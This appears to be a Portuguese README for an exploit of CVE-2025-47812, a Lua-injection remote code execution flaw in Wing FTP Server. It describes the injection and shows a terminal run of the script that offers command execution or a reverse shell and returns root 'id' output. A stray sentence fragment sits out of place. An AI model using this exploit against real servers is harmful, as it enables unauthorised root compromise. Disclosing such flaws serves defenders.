
CVE-2025-47812
A CVE-2025-47812 é uma vulnerabilidade crítica de execução remota de código (RCE) que afeta o Wing FTP Server em versões anteriores à 7.4.4. Foi descoberta por um pesquisador de segurança e foi confirmado que está sendo ativamente explorada no mundo real.
A vulnerabilidade está na lógica de autenticação do Wing FTP Server, especificamente na forma como ele lida com bytes nulos (\0) no parâmetro username.
Os atacantes podem injetar código Lua arbitrário através do campo de nome de usuário, que o servidor grava no arquivo de sessão. Quando esse arquivo de sessão é processado posteriormente, o código Lua injetado é executado, permitindo que os atacantes executem comandos a nível de sistema.
/loginok.html a redes não confiáveis.┌──(kali㉿kali)-[~]
└─$ sudo python3 CVE-2025-47812.py
============================================================
CVE-2025-47812 - Wing FTP Server RCE Exploit
============================================================
Target URL (e.g., http://localhost:5466): http://10.10.10.10
Username (e.g., anonymous): anonymous
1) Run Command
2) Get Reverse Shell
Your choice (1 or 2): 1
Command to execute (default: whoami): id
[*] Trying to get UID... Payload: id
[*] UID obtained: 1c3be4345d468da6443947f479c569978ec568a693d569774e7
[*] Sending /dir.html request...
[*] HTTP 200
------ Response Start ------
uid=0(root) gid=0(root) groups=0(root)
<?xml version="1.0" encoding="UTF-8" ?>
<alldata><nowdir><![CDATA[/]]></nowdir>
<dirdata>
</dirdata>
<nowquota>0</nowquota>
<maxquota>0</maxquota>
<readfile>1</readfile>
</alldata>
------ Response End ------
Este exploit é fornecido apenas para fins educacionais. Use-o com responsabilidade e somente em sistemas nos quais você tenha permissão explícita para testar. O autor não é responsável por qualquer uso indevido ou dano causado por esta ferramenta.